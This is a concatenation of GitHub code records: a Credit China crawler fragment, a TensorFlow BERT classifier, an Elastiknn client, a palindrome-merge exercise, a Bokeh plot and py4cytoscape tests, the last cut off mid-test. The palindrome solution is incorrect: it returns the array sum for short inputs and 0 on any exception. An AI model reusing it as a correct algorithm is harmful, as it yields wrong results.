res.get(\"status\") == 1:\n            dataDict = res.get(\"data\")\n            for key in dataDict.keys():\n                nums = dataDict.get(key)\n                if nums != 0:\n                    print(\"{}: the count of {} is {}\".format(self.comName,key,nums))\n                    self.getDataSource(type=key)\n                else:\n                    print(\"{}: the count of {} is 0\".format(self.comName,key))\n        else:\n            print(\"An error occurred while fetching the category counts\")\n\n\n    def getDataSource(self,type):\n        url = \"https://public.creditchina.gov.cn/private-api/typeSourceSearch\"\n        payload = {\n            \"type\":type,\n            \"keyword\":self.comName,\n            \"searchState\":\"1\",\n            \"entityType\":\"1\",\n            \"scenes\":\"defaultscenario\",\n            \"page\":\"1\",\n            \"pageSize\":\"100\",\n        }\n        res = reqContent(url=url,headers=self.header,payload=payload)\n        if res.get(\"message\") == \"成功\" or res.get(\"status\") == 1:\n            dataList = res.get(\"data\").get(\"list\")\n            # print(dataList)\n            for i in dataList:\n                columnList = i.get('columnList')\n                for k in columnList:\n\n                    print(i.get(\"entity\").get(k))\n                print(\"=\"*50)\n        else:\n            print(\"An exception occurred while fetching {}'s {} records\".format(self.comName,type))\n        print(\"The Credit China crawler has finished\")\n\n\n    def run(self):\n        self.getDataTypeCount()","repo_name":"MeowJ0122/CH_Crawler","sub_path":"CH_Request/function/getCreditChina.py","file_name":"getCreditChina.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"71649858323","text":"import tensorflow as tf\nimport numpy as np\nfrom sklearn import metrics\n# from . 
import bert_model as modeling\nfrom bert import run_classifier, optimization, tokenization, modeling\n\nclass BertConfig(object):\n dev_sample_percentage = 0.05\n data_file = \"data/train_data.txt\"\n test_file = \"data/test_data.txt\"\n model_dir = 'bert'\n vocab_dir = 'data/vocab.pickle'\n embedding_size = 64\n seq_len = 100\n size_layer = 128\n num_layers = 2\n num_classes = 20\n learning_rate = 0.001\n\n batch_size = 100\n num_epochs = 5\n evaluate_every = 10\n checkpoint_every = 10\n num_checkpoints = 5\n allow_soft_placement = True\n log_device_placement = True\n\n BERT_VOCAB = '../chinese_L-12_H-768_A-12/vocab.txt'\n BERT_INIT_CHKPNT = '../chinese_L-12_H-768_A-12/bert_model.ckpt'\n BERT_CONFIG = '../chinese_L-12_H-768_A-12/bert_config.json'\n\ndef create_model(\n bert_config,\n is_training,\n input_ids,\n input_mask,\n segment_ids,\n labels,\n num_labels,\n use_one_hot_embeddings,\n reuse_flag = False,\n):\n model = modeling.BertModel(\n config = bert_config,\n is_training = is_training,\n input_ids = input_ids,\n input_mask = input_mask,\n token_type_ids = segment_ids,\n use_one_hot_embeddings = use_one_hot_embeddings,\n )\n\n output_layer = model.get_pooled_output()\n hidden_size = output_layer.shape[-1].value\n with tf.variable_scope('weights', reuse = reuse_flag):\n output_weights = tf.get_variable(\n 'output_weights',\n [num_labels, hidden_size],\n initializer = tf.truncated_normal_initializer(stddev = 0.02),\n )\n output_bias = tf.get_variable(\n 'output_bias', [num_labels], initializer = tf.zeros_initializer()\n )\n\n with tf.variable_scope('loss'):\n def apply_dropout_last_layer(output_layer):\n output_layer = tf.nn.dropout(output_layer, keep_prob = 0.9)\n return output_layer\n\n def not_apply_dropout(output_layer):\n return output_layer\n\n output_layer = tf.cond(\n is_training,\n lambda: apply_dropout_last_layer(output_layer),\n lambda: not_apply_dropout(output_layer),\n )\n logits = tf.matmul(output_layer, output_weights, transpose_b = True)\n print(\n 'output_layer:',\n output_layer.shape,\n ', output_weights:',\n output_weights.shape,\n ', logits:',\n logits.shape,\n )\n\n logits = tf.nn.bias_add(logits, output_bias)\n probabilities = tf.nn.softmax(logits)\n loss = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels = labels, logits = logits\n )\n loss = tf.reduce_mean(loss)\n correct_pred = tf.equal(tf.argmax(logits, 1, output_type = tf.int32), labels)\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n return loss, logits, probabilities, model, accuracy\n\nclass Model(object):\n \"\"\"\n A RNN for text classification.\n\n \"\"\"\n def __init__(\n self, seq_len, embedding_size,\n vocab_size, num_classes, learning_rate, size_layer, num_layers):\n\n self.seq_len = seq_len\n self.embedding_size = embedding_size\n self.vocab_size = vocab_size\n self.num_classes = num_classes\n self.learning_rate = learning_rate\n self.size_layer = size_layer\n self.num_layers = num_layers\n\n self.build_model()\n def build_model(self):\n # Placeholders for input, output\n\n BERT_VOCAB = '../chinese_L-12_H-768_A-12/vocab.txt'\n BERT_INIT_CHKPNT = '../chinese_L-12_H-768_A-12/bert_model.ckpt'\n BERT_CONFIG = '../chinese_L-12_H-768_A-12/bert_config.json'\n tokenization.validate_case_matches_checkpoint(True, '')\n bert_config = modeling.BertConfig.from_json_file(BERT_CONFIG)\n tokenizer = tokenization.FullTokenizer(\n vocab_file=BERT_VOCAB, do_lower_case=True)\n\n bert_config = modeling.BertConfig(\n vocab_size=self.vocab_size,\n hidden_size=self.size_layer,\n 
num_hidden_layers=self.num_layers,\n num_attention_heads=self.size_layer // 4,\n intermediate_size=self.size_layer * 2,\n )\n\n self.input_ids = tf.placeholder(tf.int32, [None, self.seq_len])\n self.input_mask = tf.placeholder(tf.int32, [None, self.seq_len])\n self.segment_ids = tf.placeholder(tf.int32, [None, self.seq_len])\n self.label_ids = tf.placeholder(tf.int32, [None])\n self.is_training = tf.placeholder(tf.bool)\n\n use_one_hot_embeddings = False\n self.loss, self.logits, probabilities, model, self.accuracy = create_model(\n bert_config,\n self.is_training,\n self.input_ids,\n self.input_mask,\n self.segment_ids,\n self.label_ids,\n self.num_classes,\n use_one_hot_embeddings,\n )\n global_step = tf.Variable(0, trainable=False, name='Global_Step')\n self.optimizer = tf.contrib.layers.optimize_loss(\n self.loss,\n global_step=global_step,\n learning_rate=self.learning_rate,\n optimizer='Adam',\n clip_gradients=3.0,\n )\n tf.summary.scalar(\"loss\", self.loss)\n self.summary_op = tf.summary.merge_all()\n self.saver = tf.train.Saver(tf.global_variables())\n\n def train(self, sess, x_batch, y_batch):\n #对于训练阶段,需要执行self.train_op, self.loss, self.summary_op三个op,并传入相应的数据\n np_mask = np.ones((len(x_batch), self.seq_len), dtype = np.int32)\n np_segment = np.ones((len(x_batch), self.seq_len), dtype = np.int32)\n feed_dict = {\n self.input_ids: x_batch,\n self.label_ids: y_batch,\n self.input_mask: np_mask,\n self.segment_ids: np_segment,\n self.is_training: True\n }\n _, loss, accuracy, logits, summary = sess.run([self.optimizer, self.loss, self.accuracy, self.logits, self.summary_op],\n feed_dict=feed_dict)\n # y_label = np.argmax(y_batch, 1)\n prediction = np.argmax(logits, 1)\n print(metrics.classification_report(y_batch, prediction))\n return loss, summary\n def eval(self, sess, x_batch, y_batch):\n #对于训练阶段,需要执行self.train_op, self.loss, self.summary_op三个op,并传入相应的数据\n #对于训练阶段,需要执行self.train_op, self.loss, self.summary_op三个op,并传入相应的数据\n np_mask = np.ones((len(x_batch), self.seq_len), dtype = np.int32)\n np_segment = np.ones((len(x_batch), self.seq_len), dtype = np.int32)\n feed_dict = {\n self.input_ids: x_batch,\n self.label_ids: y_batch,\n self.input_mask: np_mask,\n self.segment_ids: np_segment,\n self.is_training: False\n }\n _, loss, accuracy, logits, summary = sess.run([self.optimizer, self.loss, self.accuracy, self.logits, self.summary_op],\n feed_dict=feed_dict)\n # y_label = np.argmax(y_batch, 1)\n prediction = np.argmax(logits, 1)\n print(metrics.classification_report(y_batch, prediction))\n return loss, summary\n\n def infer(self, sess, x_batch):\n #对于训练阶段,需要执行self.train_op, self.loss, self.summary_op三个op,并传入相应的数据\n #对于训练阶段,需要执行self.train_op, self.loss, self.summary_op三个op,并传入相应的数据\n np_mask = np.ones((len(x_batch), self.seq_len), dtype=np.int32)\n np_segment = np.ones((len(x_batch), self.seq_len), dtype=np.int32)\n feed_dict = {\n self.input_ids: x_batch,\n self.input_mask: np_mask,\n self.segment_ids: np_segment,\n self.is_training: False\n }\n logits = sess.run(self.logits, feed_dict=feed_dict)\n # y_label = np.argmax(y_batch, 1)\n prediction = np.argmax(logits, 1)\n # print(metrics.classification_report(y_batch, prediction))\n return prediction\n","repo_name":"Xu22/tensorflow-nlp","sub_path":"text-classification/model/bert.py","file_name":"bert.py","file_ext":"py","file_size_in_byte":8254,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"36386250764","text":"\"\"\"Forked 
from\nhttps://github.com/alexklibisz/elastiknn/tree/master/client-python/elastiknn\"\"\"\n\nimport multiprocessing\nfrom typing import Dict, List\n\nimport numpy as np\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import parallel_bulk\nfrom tqdm import tqdm\nfrom vectory.db.models import ElasticSearchIndexModel\n\nfrom .api import Mapping, NearestNeighborsQuery, Vec\n\n\nclass ElasticKNNClient:\n def __init__(self, es: Elasticsearch = None):\n \"\"\"Wrapper on the official `elasticsearch.Elasticsearch` client for making\n Elastiknn requests.\n Parameters\n ----------\n es : `elasticsearch.Elasticsearch` client.\n This client is used internally to make all requests.\n Defaults to a client pointing at http://localhost:9200.\n \"\"\"\n if es is None:\n self.es = Elasticsearch([\"http://localhost:9200\"], timeout=99)\n else:\n self.es = es\n\n def __enter__(self) -> \"ElasticKNNClient\":\n return self\n\n def __close__(self, *args):\n self.close()\n\n def close(self):\n self.es.close()\n\n def __exit__(self, *args):\n self.es.close()\n\n def delete_indices(self, indices: List[ElasticSearchIndexModel]):\n for index in indices:\n self.delete_index(index.name)\n\n def delete_index(self, index_name: str):\n self.es.indices.delete(index=index_name, ignore=[404])\n\n def create_index(\n self,\n index_name: str,\n mapping: Mapping.Base,\n header_mapping: dict,\n number_of_shards: int = 1,\n ):\n \"\"\"\n Update the mapping at the given index and field to store an Elastiknn vector.\n\n Parameters\n ----------\n index_name : string\n Name of the index to create for knn search\n mapping : instance of `Mapping.Base`\n Mapping object defining the vector's storage properties.\n header_mapping : dict\n Mapping that defines the metadata fields that will be stored in the index.\n number_of_shards : int\n Number of shards to use for the index. Elastiknn queries execute once per\n shard in parallel, you can generally speed up your queries by adding more\n shards to the index. Defaults to 1.\n\n Returns\n -------\n Dict\n Json response as a dict. Successful request returns\n `{\"acknowledged\": true}`.\n \"\"\"\n index_settings = {\"number_of_shards\": number_of_shards, \"elastiknn\": True}\n index_mappings = {\n \"properties\": {\n \"embedding\": mapping.to_dict(),\n **header_mapping,\n }\n }\n\n return self.es.indices.create(\n index=index_name,\n settings=index_settings,\n mappings=index_mappings,\n )\n\n def index(\n self,\n index: str,\n embeddings: np.ndarray,\n metadata: List[dict],\n id_field: str,\n refresh: bool = False,\n num_threads: int = max(2, multiprocessing.cpu_count() - 2),\n chunk_size: int = 1000,\n ) -> int:\n \"\"\"Index (i.e. store) the given vectors at the given index and field with the\n optional ids.\n\n Parameters\n ----------\n index : string\n Index where the vectors are stored.\n embeddings : Numpy array\n Vectors that should be indexed.\n metadata : List of Dicts\n Metadata associated with the given vectors. Should have same length as vecs.\n id_field:\n Field containing the document ID. Uses `store: true` setting as an\n optimization for faster id-only queries.\n refresh : bool\n Whether to refresh before returning. 
Set to true if you want to immediately\n run queries after indexing.\n num_threads : int\n Number of threads to use for indexing.\n chunk_size : int\n Number of vectors to index in a single bulk request.\n\n Returns\n -------\n Int\n Number of vectors successfully indexed.\n \"\"\"\n\n def embedding_generator():\n for embedding, embedding_metadata in zip(embeddings, metadata):\n yield {\n \"_op_type\": \"index\",\n \"_index\": index,\n \"_id\": str(embedding_metadata.get(id_field)),\n \"embedding\": Vec.DenseFloat(list(embedding)).to_dict(),\n **embedding_metadata,\n }\n\n succeses = 0\n for ok, _ in tqdm(\n parallel_bulk(\n client=self.es,\n actions=embedding_generator(),\n thread_count=num_threads,\n chunk_size=chunk_size,\n )\n ):\n succeses += ok\n\n if refresh:\n self.es.indices.refresh(index=index)\n\n return succeses\n\n def list_indices(self) -> List[str]:\n index_names = []\n for index_json in self.es.cat.indices(format=\"json\"):\n index_names.append(index_json[\"index\"]) # type: ignore\n return index_names\n\n def nearest_neighbors(\n self,\n index: str,\n query: NearestNeighborsQuery.Base,\n id_field: str,\n k: int = 10,\n fetch_source: bool = False,\n ) -> Dict:\n \"\"\"Build and execute a nearest neighbors query against the given index.\n\n Parameters\n ----------\n index : string\n Index to run the search against.\n query : NearestNeighborsQuery.Base\n Query object defining the query properties.\n id_field:\n Field containing the document ID. Uses `store: true` setting as an\n optimization for faster id-only queries.\n k: int\n Number of hits to return.\n fetch_source : bool\n Whether to return the `_source` of the document. If you only need the ID,\n it's generally much faster to set this to False and instead of accessing\n the ID in hit['_id'], it will be in hit['fields'][id_field][0].\n\n Returns\n -------\n Dict\n Standard Elasticsearch search response parsed as a dict.\n \"\"\"\n query_body = {\"elastiknn_nearest_neighbors\": query.to_dict()}\n if fetch_source:\n return self.es.search(index=index, query=query_body, size=k)\n else:\n return self.es.search(\n index=index,\n query=query_body,\n size=k,\n _source=fetch_source,\n docvalue_fields=[id_field],\n stored_fields=\"_none_\",\n filter_path=[f\"hits.hits.fields.{id_field}\", \"hits.hits._score\"],\n )\n","repo_name":"pentoai/vectory","sub_path":"vectory/es/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6756,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"3"} +{"seq_id":"548572349","text":"\"\"\"\nMerge-operations-to-turn-array-into-a-palindrome\n\n\nYou are given an array nums consisting of positive integers.\n\nYou can perform the following operation on the array any number of times:\n\nChoose any two adjacent elements and replace them with their sum.\nFor example, if nums = [1,2,3,1], you can apply one operation to make it [1,5,1].\nReturn the minimum number of operations needed to turn the array into a palindrome.\n\n \n\nExample 1:\n\nInput: nums = [4,3,2,1,2,3,1]\nOutput: 2\nExplanation: We can turn the array into a palindrome in 2 operations as follows:\n- Apply the operation on the fourth and fifth element of the array, nums becomes equal to [4,3,2,3,3,1].\n- Apply the operation on the fifth and sixth element of the array, nums becomes equal to [4,3,2,3,4].\nThe array [4,3,2,3,4] is a palindrome.\nIt can be shown that 2 is the minimum number of operations needed.\nExample 2:\n\nInput: nums = [1,2,3,4]\nOutput: 3\nExplanation: We do the 
operation 3 times in any position, we obtain the array [10] at the end which is a palindrome.\n\"\"\"\n\nclass Solution:\n def minimumOperations(self, nums: list) -> int:\n \n # Border case, empty list\n if len(nums) == 0:\n return 0\n \n # Border case, if len(list) < 3\n if len(nums) < 3:\n return sum(nums)\n\n\n left, right = 0, len(nums) - 1\n\n # Variable to count performed operations\n ops_counter:int = 0\n\n palindrome_found:bool = False\n try:\n while not palindrome_found:\n \n l_value:int = nums[left]\n r_value:int = nums[right]\n aux_value:int = 0\n if r_value < l_value:\n # Sum and delete at the right of the array\n aux_value = nums[right - 1]\n upd_right = r_value + aux_value\n\n # Update the array with the updated value\n nums[right] = upd_right\n\n # delete the aux position\n del nums[right - 1]\n\n # Update right pointer to -1 position given the new array shape\n right -= 1\n\n # Sum 1 to performed operations\n ops_counter += 1\n\n elif r_value > l_value:\n # Sum and delete at the left of the array\n aux_value = nums[left + 1]\n upd_left = l_value + aux_value\n\n #Update the array with the updated value\n nums[left] = upd_left\n\n # delete the aux position\n del nums[left + 1]\n\n # Update rigth pointer to -1 position given the new array shape\n right -= 1\n\n # Sum 1 to performed operations\n ops_counter += 1\n\n else:\n # left and right are equal, check if palindrome, if not, move the pointers\n\n # Check if the array has a middle value\n \n if (len(nums) - 1) % 2 == 0:\n middle = int(len(nums) / 2)\n #print('middle= ', middle)\n left_part = nums[:middle]\n right_part = nums[middle+1:][::-1]\n\n # If this enters, then BAM, it is a palindrome\n if left_part == right_part:\n palindrome_found = True\n #print('pal found= ', palindrome_found)\n break\n\n \n left += 1\n right -= 1\n except:\n return 0\n\n \n\n return ops_counter\n \n\n\n ","repo_name":"zzznavarrete/data_structures","sub_path":"src/exercises/arrays/30_int_palindrome.py","file_name":"30_int_palindrome.py","file_ext":"py","file_size_in_byte":3752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16223121643","text":"from bokeh.io import output_file\nfrom bokeh.plotting import figure, show\nfrom bokeh.models import ColumnDataSource, CDSView, GroupFilter\n\n# Import the data\nfrom read_nba_data import *\n\n# Output to static HTML file\noutput_file('west_top_2_standings_race.html',\n title='Western Conference Top 2 Teams Wins Race')\n\n# Create a ColumnDataSource\nwest_cds = ColumnDataSource(west_top_2)\n\n# Create view for each team\nrockets_view = CDSView(source=west_cds,\n filters=[GroupFilter(column_name='teamAbbr', group='HOU')])\n\nwarriors_view = CDSView(source=west_cds,\n filters=[GroupFilter(column_name='teamAbbr', group='GS')])\n\n# Create and configure the figure\nfig = figure(x_axis_type='datetime',\n plot_height=300, plot_width=600,\n title='Western Conference Top 2 Teams Wins Race, 2017-18',\n x_axis_label='Date', y_axis_label='Wins',\n toolbar_location=None)\n\n# Render the race as step lines\nfig.step('stDate', 'gameWon', \n color='#CE1141', legend='Rockets', \n source=west_cds, view=rockets_view)\nfig.step('stDate', 'gameWon', \n color='#006BB6', legend='Warriors', \n source=west_cds, view=warriors_view)\n\n# Move the legend to the upper left corner\nfig.legend.location = 'top_left'\n\n# Show the plot\nshow(fig) 
","repo_name":"lhatpku/Bokeh","sub_path":"WestConfTop2.py","file_name":"WestConfTop2.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16519535362","text":"# -*- coding: utf-8 -*-\n\n\"\"\" Test functions in tools.py.\n\"\"\"\nimport os\n\n\"\"\"License:\n Copyright 2020-2022 The Cytoscape Consortium\n\n Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated\n documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation\n the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,\n and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\n The above copyright notice and this permission notice shall be included in all copies or substantial portions\n of the Software.\n\n THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE\n WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS\n OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR\n OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\nimport unittest\nimport time\nfrom requests import HTTPError\n\nfrom test_utils import *\n\n\nclass ToolsTests(unittest.TestCase):\n def setUp(self):\n # Close all browser windows if possible\n try:\n for browser in cybrowser_list():\n cybrowser_close(browser['id'])\n except:\n pass\n\n def tearDown(self):\n pass\n\n BROWSER_HELLO = {'id': 'Browser Hello ID',\n 'show': {'func': lambda x, y: cybrowser_show(id=x, title=y,\n text='HelloHello, world!'),\n 'title': 'Browser Hello Page'},\n 'dialog': {'func': lambda x, y: cybrowser_dialog(id=x, title=y,\n text='HelloHello, world!'),\n 'title': 'Hello'}}\n CYTOSCAPE_HOME_PAGE = {'id': 'Cytoscape Home Page ID',\n 'show': {\n 'func': lambda x, y: cybrowser_show(id=x, title=y, url='http://www.cytoscape.org'),\n 'title': 'Cytoscape Home Page'},\n 'dialog': {\n 'func': lambda x, y: cybrowser_dialog(id=x, title=y,\n url='http://www.cytoscape.org'),\n 'title': 'Cytoscape: An Open Source Platform for Complex Network Analysis and Visualization'}}\n CYTOSCAPE_MANUAL = {'id': 'Cytoscape Manual ID',\n 'show': {'func': lambda x, y: cybrowser_show(id=x, title=y,\n url='http://manual.cytoscape.org/en/3.7.2/'),\n 'title': 'Cytoscape Manual Page'},\n 'dialog': {\n 'func': lambda x, y: cybrowser_dialog(id=x, title=y,\n url='http://manual.cytoscape.org/en/3.7.2/'),\n 'title': 'Cytoscape 3.7.2 User Manual — Cytoscape User Manual 3.7.2 documentation'}}\n\n @print_entry_exit\n def test_cybrowser_version(self):\n # Verify that a version is reported\n version = cybrowser_version()\n self.assertIsInstance(version, dict)\n self.assertIsInstance(version['version'], str)\n\n @unittest.skipIf(skip_for_ui(), 'Avoiding test that requires user response')\n @print_entry_exit\n def test_cybrowser_show_list_hide(self):\n self._cybrowser_windows('show')\n\n @unittest.skipIf(skip_for_ui(), 'Avoiding test that requires user response')\n @print_entry_exit\n def test_cybrowser_dialog_list_hide(self):\n self._cybrowser_windows('dialog')\n\n @unittest.skipIf(skip_for_ui(), 'Avoiding test that requires user response')\n @print_entry_exit\n def 
test_cybrowser_send(self):\n self._check_show('dialog', ToolsTests.CYTOSCAPE_HOME_PAGE)\n window_id = ToolsTests.CYTOSCAPE_HOME_PAGE['id']\n\n # Verify that the user agent variable can be fetched\n res = cybrowser_send(window_id, 'navigator.userAgent')\n self.assertIsInstance(res, dict)\n self.assertEqual(res['browserId'], window_id)\n self.assertIsInstance(res['result'], str)\n\n # Verify that the window can be moved to a different URL\n res = cybrowser_send(window_id, \"window.location='http://google.com'\")\n self.assertEqual(res['browserId'], window_id)\n self.assertEqual(res['result'], 'http://google.com')\n\n self.assertRaises(CyError, cybrowser_send, 'bogus window', 'navigator.userAgent')\n\n self.assertDictEqual(cybrowser_send(window_id, 'bogus_statement'), {})\n\n @print_entry_exit\n def test_diffusion_basic(self):\n # Initialization\n load_test_session()\n\n # Verify that selecting a node and calling diffusion returns a bunch of nodes\n select_nodes(['RAP1'], by_col='COMMON')\n res = diffusion_basic()\n self.assertIsInstance(res, dict)\n self.assertEqual(res['heatColumn'], 'diffusion_output_heat')\n self.assertEqual(res['rankColumn'], 'diffusion_output_rank')\n self.assertTrue(len(get_selected_nodes()) > 0)\n\n # Verify that diffusion returns nodes even when nothing is selected\n clear_selection()\n res = diffusion_basic()\n self.assertIsInstance(res, dict)\n self.assertEqual(res['heatColumn'], 'diffusion_output_1_heat')\n self.assertEqual(res['rankColumn'], 'diffusion_output_1_rank')\n self.assertTrue(len(get_selected_nodes()) > 0)\n\n @print_entry_exit\n def test_diffusion_advanced(self):\n # Initialization\n load_test_session()\n\n # Verify that selecting a node and calling diffusion returns a bunch of nodes\n select_nodes(['RAP1'], by_col='COMMON')\n res = diffusion_advanced(heat_column_name='', time=0.1)\n self.assertIsInstance(res, dict)\n self.assertEqual(res['heatColumn'], 'diffusion_output_heat')\n self.assertEqual(res['rankColumn'], 'diffusion_output_rank')\n self.assertTrue(len(get_selected_nodes()) > 0)\n\n # Verify that diffusion returns nodes even when nothing is selected\n clear_selection()\n res = diffusion_advanced(heat_column_name='diffusion_output_heat', time=0.2)\n self.assertIsInstance(res, dict)\n self.assertEqual(res['heatColumn'], 'diffusion_output_1_heat')\n self.assertEqual(res['rankColumn'], 'diffusion_output_1_rank')\n self.assertTrue(len(get_selected_nodes()) > 0)\n\n # Verify that a bad parameter causes an exception\n self.assertRaises(CyError, diffusion_advanced, heat_column_name='diffusion_output_heat', time='x')\n\n @print_entry_exit\n def test_analyze_network(self):\n\n def check_analysis(actual, expected, compare_props):\n self.assertIsInstance(actual, dict)\n self.assertTrue(set(expected).issubset(set(actual)))\n member_equal = [expected[prop] == actual[prop] for prop in compare_props]\n self.assertFalse(False in member_equal)\n\n # Initialization\n load_test_session()\n\n check_analysis(analyze_network(),\n {'networkTitle': 'galFiltered.sif (undirected)', 'nodeCount': '330', 'edgeCount': '359',\n 'avNeighbors': '2.379032258064516', 'diameter': '27', 'radius': '14',\n 'avSpl': '9.127660963823953', 'cc': '0.06959203036053131', 'density': '0.009631709546819902',\n 'heterogeneity': '0.8534500004035027', 'centralization': '0.06375695335900727', 'ncc': '26'},\n {'networkTitle', 'nodeCount', 'edgeCount', 'diameter', 'radius', 'ncc'})\n check_analysis(analyze_network(True),\n {'networkTitle': 'galFiltered.sif (directed)', 'nodeCount': '330', 
'edgeCount': '359',\n 'avNeighbors': '2.16969696969697', 'diameter': '10', 'radius': '1',\n 'avSpl': '3.4919830756382395', 'cc': '0.03544266191325015', 'density': '0.003297411808050106',\n 'ncc': '26', 'mnp': '1', 'nsl': '0'},\n {'networkTitle', 'nodeCount', 'edgeCount', 'diameter', 'radius', 'ncc', 'mnp', 'nsl'})\n\n @print_entry_exit\n def test_network_merge(self):\n\n BASIC_MERGED_NODE_PROPS = {'SUID': 'Long', 'shared name': 'String', 'name': 'String', 'selected': 'Boolean',\n 'age': 'Integer', 'first name': 'String', 'given name': 'String', 'group': 'String',\n 'id': 'String', 'score': 'Integer'}\n BASIC_MERGED_EDGE_PROPS = {'SUID': 'Long', 'shared name': 'String', 'shared interaction': 'String',\n 'name': 'String',\n 'selected': 'Boolean', 'interaction': 'String', 'data.key.column': 'Integer',\n 'owes': 'Integer', 'relationship': 'String', 'source': 'String', 'target': 'String',\n 'weight': 'Double'}\n BASIC_MERGED_NETWORK_PROPS = {'SUID': 'Long', 'shared name': 'String', 'name': 'String', 'selected': 'Boolean',\n '__Annotations': 'List'}\n BASIC_MERGED_NODES = {'node X', 'node 12', 'node 13', 'node 10', 'node 11', 'node 2', 'node 3', 'node 0',\n 'node 1'}\n BASIC_MERGED_EDGES = {'node 2 (interacts) node 3', 'node X (destroys) node 0',\n 'node 10 (interacts with) node 13', 'node 12 (interacts with) node 13',\n 'node 10 (interacts with) node 11', 'node 10 (interacts with) node 12',\n 'node 0 (interacts) node 2', 'node 0 (activates) node 3',\n 'node X (interacts with) node 10', 'node 0 (inhibits) node 1'}\n\n def check_merge(new_suid, new_title, node_count=9, edge_count=10,\n extra_node_props={}, extra_edge_props={}, extra_network_props={},\n merged_nodes=BASIC_MERGED_NODES, merged_edges=BASIC_MERGED_EDGES):\n self.assertEqual(get_network_name(suid=new_suid), new_title, 'Check title')\n self.assertEqual(get_node_count(network=new_suid), node_count, 'Check node count')\n self.assertEqual(get_edge_count(network=new_suid), edge_count, 'Check edge count')\n if node_count:\n self.assertEqual(set(get_all_nodes(network=new_suid)), merged_nodes, 'Check all nodes')\n if edge_count:\n self.assertSetEqual(set(get_all_edges(network=new_suid)), merged_edges, 'Check all edges')\n actual_nodes = BASIC_MERGED_NODE_PROPS.copy()\n actual_nodes.update(extra_node_props)\n actual_edges = BASIC_MERGED_EDGE_PROPS.copy()\n actual_edges.update(extra_edge_props)\n actual_networks = BASIC_MERGED_NETWORK_PROPS.copy()\n actual_networks.update(extra_network_props)\n self.assertDictEqual(get_table_column_types('node', network=new_suid), actual_nodes, 'Check column types')\n self.assertDictEqual(get_table_column_types('edge', network=new_suid), actual_edges, 'Check edge types')\n self.assertDictEqual(get_table_column_types('network', network=new_suid), actual_networks, 'Check network types')\n\n # Setup: clean out previous test\n close_session(False)\n \n x = {'first':1, 'second':2}\n y = {'second':2, 'first': 1}\n\n # Setup: Create the first network (Network_0)\n node_data_0 = {'id': [\"node 0\", \"node 1\", \"node 2\", \"node 3\", 'node X'],\n 'given name': [\"Barry\", \"Karen\", \"Scott\", \"Robyn\", \"X\"],\n 'group': [\"A\", \"A\", \"B\", \"B\", \"C\"],\n 'score': [20, 10, 15, 5, -10]}\n nodes_0 = df.DataFrame(data=node_data_0, columns=['id', 'given name', 'group', 'score'])\n edge_data_0 = {'source': [\"node 0\", \"node 0\", \"node 0\", \"node 2\", \"node X\"],\n 'target': [\"node 1\", \"node 2\", \"node 3\", \"node 3\", \"node 0\"],\n 'interaction': [\"inhibits\", \"interacts\", \"activates\", \"interacts\", 
\"destroys\"],\n 'weight': [5.1, 3.0, 5.2, 9.9, -100]}\n edges_0 = df.DataFrame(data=edge_data_0, columns=['source', 'target', 'interaction', 'weight'])\n\n create_network_from_data_frames(nodes_0, edges_0, title='Network_0')\n\n # Setup: Create the second network (Network_1)\n node_data_1 = {'id': [\"node 10\", \"node 11\", \"node 12\", \"node 13\", \"node X\"], \n 'first name': [\"Barry\", \"Karen\", \"Scott\", \"Robyn\", \"X\"],\n 'age': [7, 5, 4, 0, -1]}\n nodes_1 = df.DataFrame(data=node_data_1, columns=['id', 'first name', 'age'])\n edge_data_1 = {'source': [\"node 10\", \"node 10\", \"node 10\", \"node 12\", 'node X'],\n 'target': [\"node 11\", \"node 12\", \"node 13\", \"node 13\", \"node 10\"],\n 'relationship': [\"sister\", \"brother\", \"brother\", \"sister\", \"cousin\"],\n 'owes': [10, 20, 30, 40, -1000]}\n edges_1 = df.DataFrame(data=edge_data_1, columns=['source', 'target', 'relationship', 'owes'])\n\n # Verify that a network can be created containing dataframe encoding both nodes and edges\n create_network_from_data_frames(nodes_1, edges_1, title='Network_1')\n\n # Verify that the simplest union merge works\n check_merge(merge_networks(['Network_0', 'Network_1']), 'union: Network_0,Network_1')\n check_merge(merge_networks(['Network_0', 'Network_1'], title='My Cool Network'), 'My Cool Network')\n\n # Verify that a node merge map works -- 'called' and 'score_m' were created and have String/Integer types\n res = merge_networks(['Network_0', 'Network_1'],\n node_merge_map=[['given name', 'first name', 'called', 'String'],\n ['score', 'age', 'score_m', 'Integer']],\n title='nodes mapped')\n check_merge(res, 'nodes mapped', 9, 10, extra_node_props={'called': 'String', 'score_m': 'Integer'})\n\n # Verify that an edge merge map works -- 'profile' was created and has Double type\n res = merge_networks(['Network_0', 'Network_1'],\n edge_merge_map=[['weight', 'owes', 'profile', 'Double']],\n title='edges mapped')\n check_merge(res, 'edges mapped', 9, 10, extra_edge_props={'profile': 'Double'})\n\n # Verify that a network merge map works -- 'jumble forward' and 'jumble backward' were created and have String type\n res = merge_networks(['Network_0', 'Network_1'],\n network_merge_map=[['shared name', 'name', 'jumble forward', 'String'],\n 